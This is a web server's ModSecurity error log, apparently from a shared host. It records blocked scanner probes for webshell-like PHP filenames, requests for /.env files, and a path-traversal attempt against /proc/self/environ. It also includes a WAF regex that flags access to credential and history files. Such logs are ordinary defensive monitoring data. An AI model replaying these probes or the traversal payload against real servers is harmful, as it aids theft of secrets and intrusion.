[Tue May 26 16:29:52.891370 2026] [security2:error] [pid 808625:tid 808862] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KDEl_SBaWibfDmpFUQAAAGs"]
[Tue May 26 16:29:53.161602 2026] [security2:error] [pid 808625:tid 808848] [client 40.83.92.30:6088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/166.php"] [unique_id "ahV9KTEl_SBaWibfDmpFVQAAAF0"]
[Tue May 26 16:29:53.161721 2026] [security2:error] [pid 808625:tid 808848] [client 40.83.92.30:6088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/166.php"] [unique_id "ahV9KTEl_SBaWibfDmpFVQAAAF0"]
[Tue May 26 16:29:53.736830 2026] [security2:error] [pid 808625:tid 808838] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KTEl_SBaWibfDmpFZgAAAFM"]
[Tue May 26 16:29:53.856849 2026] [security2:error] [pid 808625:tid 808830] [client 40.83.92.30:6134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-mail.php"] [unique_id "ahV9KTEl_SBaWibfDmpFaQAAAEs"]
[Tue May 26 16:29:53.856977 2026] [security2:error] [pid 808625:tid 808830] [client 40.83.92.30:6134] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/wp-mail.php"] [unique_id "ahV9KTEl_SBaWibfDmpFaQAAAEs"]
[Tue May 26 16:29:54.350182 2026] [security2:error] [pid 808625:tid 808815] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9KTEl_SBaWibfDmpFYwAAADw"]
[Tue May 26 16:29:54.388246 2026] [security2:error] [pid 808625:tid 808797] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KjEl_SBaWibfDmpFdAAAACo"]
[Tue May 26 16:29:54.397213 2026] [security2:error] [pid 808625:tid 808763] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KjEl_SBaWibfDmpFdgAAAAg"]
[Tue May 26 16:29:54.575154 2026] [security2:error] [pid 808625:tid 808880] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KjEl_SBaWibfDmpFeQAAAH0"]
[Tue May 26 16:29:54.877268 2026] [security2:error] [pid 808625:tid 808876] [client 40.83.92.30:5774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/leaf.php"] [unique_id "ahV9KjEl_SBaWibfDmpFfQAAAHk"]
[Tue May 26 16:29:54.877411 2026] [security2:error] [pid 808625:tid 808876] [client 40.83.92.30:5774] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/leaf.php"] [unique_id "ahV9KjEl_SBaWibfDmpFfQAAAHk"]
[Tue May 26 16:29:55.152969 2026] [security2:error] [pid 808625:tid 808840] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KzEl_SBaWibfDmpFiwAAAFU"]
[Tue May 26 16:29:55.308125 2026] [security2:error] [pid 808625:tid 808807] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KzEl_SBaWibfDmpFkgAAADQ"]
[Tue May 26 16:29:55.574611 2026] [security2:error] [pid 808625:tid 808829] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KzEl_SBaWibfDmpFmgAAAEo"]
[Tue May 26 16:29:55.852211 2026] [security2:error] [pid 808625:tid 808775] [client 40.83.92.30:5790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/grsiuk.php"] [unique_id "ahV9KzEl_SBaWibfDmpFqQAAABQ"]
[Tue May 26 16:29:55.852330 2026] [security2:error] [pid 808625:tid 808775] [client 40.83.92.30:5790] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/grsiuk.php"] [unique_id "ahV9KzEl_SBaWibfDmpFqQAAABQ"]
[Tue May 26 16:29:55.923302 2026] [security2:error] [pid 808625:tid 808795] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KzEl_SBaWibfDmpFpQAAACg"]
[Tue May 26 16:29:55.947433 2026] [security2:error] [pid 808625:tid 808856] [client 176.65.139.232:56606] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dgssi.svijaykumar.in"] [uri "/.env"] [unique_id "ahV9KzEl_SBaWibfDmpFrgAAAGU"]
[Tue May 26 16:29:56.168656 2026] [security2:error] [pid 808625:tid 808811] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9LDEl_SBaWibfDmpFsgAAADg"]
[Tue May 26 16:29:56.301098 2026] [security2:error] [pid 808625:tid 808784] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9LDEl_SBaWibfDmpFvAAAAB0"]
[Tue May 26 16:29:56.307680 2026] [security2:error] [pid 808625:tid 808881] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9LDEl_SBaWibfDmpFvQAAAH4"]
[Tue May 26 16:29:56.385946 2026] [security2:error] [pid 808625:tid 808842] [client 176.65.139.237:58120] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "trichycityag.svijaykumar.in"] [uri "/.env"] [unique_id "ahV9LDEl_SBaWibfDmpFwQAAAFc"]
[Tue May 26 16:29:56.671692 2026] [security2:error] [pid 808625:tid 808756] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9LDEl_SBaWibfDmpFuwAAAAE"]
[Tue May 26 16:29:56.858345 2026] [security2:error] [pid 808625:tid 808863] [client 40.83.92.30:6140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/8.php"] [unique_id "ahV9LDEl_SBaWibfDmpFywAAAGw"]
[Tue May 26 16:29:56.858494 2026] [security2:error] [pid 808625:tid 808863] [client 40.83.92.30:6140] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/8.php"] [unique_id "ahV9LDEl_SBaWibfDmpFywAAAGw"]
[Tue May 26 16:29:57.350976 2026] [security2:error] [pid 808625:tid 808845] [client 40.83.92.30:6131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/fs.php"] [unique_id "ahV9LTEl_SBaWibfDmpF1QAAAFo"]
[Tue May 26 16:29:57.351171 2026] [security2:error] [pid 808625:tid 808845] [client 40.83.92.30:6131] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/fs.php"] [unique_id "ahV9LTEl_SBaWibfDmpF1QAAAFo"]
[Tue May 26 16:29:57.474689 2026] [security2:error] [pid 808625:tid 808854] [client 176.65.139.234:32818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "osmsi.svijaykumar.in"] [uri "/.env"] [unique_id "ahV9LTEl_SBaWibfDmpF2wAAAGM"]
[Tue May 26 16:29:57.701496 2026] [autoindex:error] [pid 808625:tid 808870] [client 66.249.66.168:41537] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:29:57.974823 2026] [security2:error] [pid 808625:tid 808794] [client 40.83.92.30:6090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/ws38.php"] [unique_id "ahV9LTEl_SBaWibfDmpF6gAAACc"]
[Tue May 26 16:29:57.974974 2026] [security2:error] [pid 808625:tid 808794] [client 40.83.92.30:6090] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/ws38.php"] [unique_id "ahV9LTEl_SBaWibfDmpF6gAAACc"]
[Tue May 26 16:29:58.513484 2026] [security2:error] [pid 808625:tid 808882] [client 40.83.92.30:6108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/a7.php"] [unique_id "ahV9LjEl_SBaWibfDmpF-AAAAH8"]
[Tue May 26 16:29:58.513595 2026] [security2:error] [pid 808625:tid 808882] [client 40.83.92.30:6108] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/a7.php"] [unique_id "ahV9LjEl_SBaWibfDmpF-AAAAH8"]
[Tue May 26 16:29:59.224117 2026] [security2:error] [pid 808625:tid 808854] [client 40.83.92.30:5794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/classsmtps.php"] [unique_id "ahV9LzEl_SBaWibfDmpGDAAAAGM"]
[Tue May 26 16:29:59.224261 2026] [security2:error] [pid 808625:tid 808854] [client 40.83.92.30:5794] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/classsmtps.php"] [unique_id "ahV9LzEl_SBaWibfDmpGDAAAAGM"]
[Tue May 26 16:30:00.084140 2026] [security2:error] [pid 808625:tid 808836] [client 40.83.92.30:6120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/amax.php"] [unique_id "ahV9MDEl_SBaWibfDmpGHgAAAFE"]
[Tue May 26 16:30:00.084256 2026] [security2:error] [pid 808625:tid 808836] [client 40.83.92.30:6120] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/amax.php"] [unique_id "ahV9MDEl_SBaWibfDmpGHgAAAFE"]
[Tue May 26 16:30:00.184599 2026] [security2:error] [pid 808625:tid 808816] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9LzEl_SBaWibfDmpGEwAAAD0"]
[Tue May 26 16:30:00.916195 2026] [security2:error] [pid 808625:tid 808784] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9MDEl_SBaWibfDmpGIQAAAB0"]
[Tue May 26 16:30:01.486536 2026] [security2:error] [pid 808625:tid 808773] [client 40.83.92.30:5791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/CDX1.php"] [unique_id "ahV9MTEl_SBaWibfDmpGPgAAABI"]
[Tue May 26 16:30:01.486692 2026] [security2:error] [pid 808625:tid 808773] [client 40.83.92.30:5791] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/CDX1.php"] [unique_id "ahV9MTEl_SBaWibfDmpGPgAAABI"]
[Tue May 26 16:30:02.215866 2026] [security2:error] [pid 808625:tid 808821] [client 40.83.92.30:6137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/rip.php"] [unique_id "ahV9MjEl_SBaWibfDmpGUwAAAEI"]
[Tue May 26 16:30:02.216001 2026] [security2:error] [pid 808625:tid 808821] [client 40.83.92.30:6137] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/rip.php"] [unique_id "ahV9MjEl_SBaWibfDmpGUwAAAEI"]
[Tue May 26 16:30:02.555263 2026] [security2:error] [pid 808625:tid 808828] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9MTEl_SBaWibfDmpGSAAAAEk"]
[Tue May 26 16:30:02.905119 2026] [security2:error] [pid 808625:tid 808863] [client 40.83.92.30:6139] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "afstpaul.org"] [uri "/1.php"] [unique_id "ahV9MjEl_SBaWibfDmpGXQAAAGw"]
[Tue May 26 16:30:02.905232 2026] [security2:error] [pid 808625:tid 808863] [client 40.83.92.30:6139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/1.php"] [unique_id "ahV9MjEl_SBaWibfDmpGXQAAAGw"]
[Tue May 26 16:30:02.905321 2026] [security2:error] [pid 808625:tid 808863] [client 40.83.92.30:6139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/1.php"] [unique_id "ahV9MjEl_SBaWibfDmpGXQAAAGw"]
[Tue May 26 16:30:03.857506 2026] [security2:error] [pid 808625:tid 808765] [client 40.83.92.30:5786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/chosen.php"] [unique_id "ahV9MzEl_SBaWibfDmpGcQAAAAo"]
[Tue May 26 16:30:03.857606 2026] [security2:error] [pid 808625:tid 808765] [client 40.83.92.30:5786] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/chosen.php"] [unique_id "ahV9MzEl_SBaWibfDmpGcQAAAAo"]
[Tue May 26 16:30:04.047559 2026] [security2:error] [pid 808625:tid 808776] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9MzEl_SBaWibfDmpGdwAAABU"]
[Tue May 26 16:30:04.128087 2026] [security2:error] [pid 808625:tid 808798] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9NDEl_SBaWibfDmpGewAAACs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1232283&moderation-hash=43b8394d8ca4bca40bc29b5b711a71c9
[Tue May 26 16:30:04.506050 2026] [security2:error] [pid 808625:tid 808872] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9NDEl_SBaWibfDmpGfwAAAHU"]
[Tue May 26 16:30:04.546211 2026] [security2:error] [pid 808625:tid 808757] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9NDEl_SBaWibfDmpGjAAAAAI"]
[Tue May 26 16:30:04.671726 2026] [security2:error] [pid 808625:tid 808823] [client 40.83.92.30:6121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/css.php"] [unique_id "ahV9NDEl_SBaWibfDmpGjQAAAEQ"]
[Tue May 26 16:30:04.671862 2026] [security2:error] [pid 808625:tid 808823] [client 40.83.92.30:6121] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/css.php"] [unique_id "ahV9NDEl_SBaWibfDmpGjQAAAEQ"]
[Tue May 26 16:30:04.819198 2026] [security2:error] [pid 808625:tid 808866] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9NDEl_SBaWibfDmpGkAAAAG8"]
[Tue May 26 16:30:04.968479 2026] [security2:error] [pid 808625:tid 808810] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9NDEl_SBaWibfDmpGlwAAADc"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1232283&moderation-hash=43b8394d8ca4bca40bc29b5b711a71c9
[Tue May 26 16:30:05.529377 2026] [security2:error] [pid 808625:tid 808832] [client 92.118.39.194:45550] ModSecurity: Access denied with connection close (phase 1). Pattern match "proc/self/environ" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1161"] [id "999997"] [msg "proc environ"] [hostname "yourstorybag.com"] [uri "/public/plugins/alertlist/../../../../../../../proc/self/environ"] [unique_id "ahV9NTEl_SBaWibfDmpGngAAAE0"]
[Tue May 26 16:30:06.258034 2026] [security2:error] [pid 808625:tid 808861] [client 176.65.139.236:52010] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "hassina-foundation.com"] [uri "/.env"] [unique_id "ahV9NjEl_SBaWibfDmpGtgAAAGo"]
[Tue May 26 16:30:06.263687 2026] [security2:error] [pid 808625:tid 808849] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9NjEl_SBaWibfDmpGtQAAAF4"]
[Tue May 26 16:30:06.366038 2026] [security2:error] [pid 808625:tid 808880] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9NjEl_SBaWibfDmpGuQAAAH0"]
[Tue May 26 16:30:06.737106 2026] [security2:error] [pid 808625:tid 808795] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9NjEl_SBaWibfDmpGvAAAACg"]
[Tue May 26 16:30:06.989062 2026] [security2:error] [pid 808625:tid 808831] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9NjEl_SBaWibfDmpGygAAAEw"]
[Tue May 26 16:30:07.746714 2026] [security2:error] [pid 808625:tid 808773] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9NzEl_SBaWibfDmpG5AAAABI"]
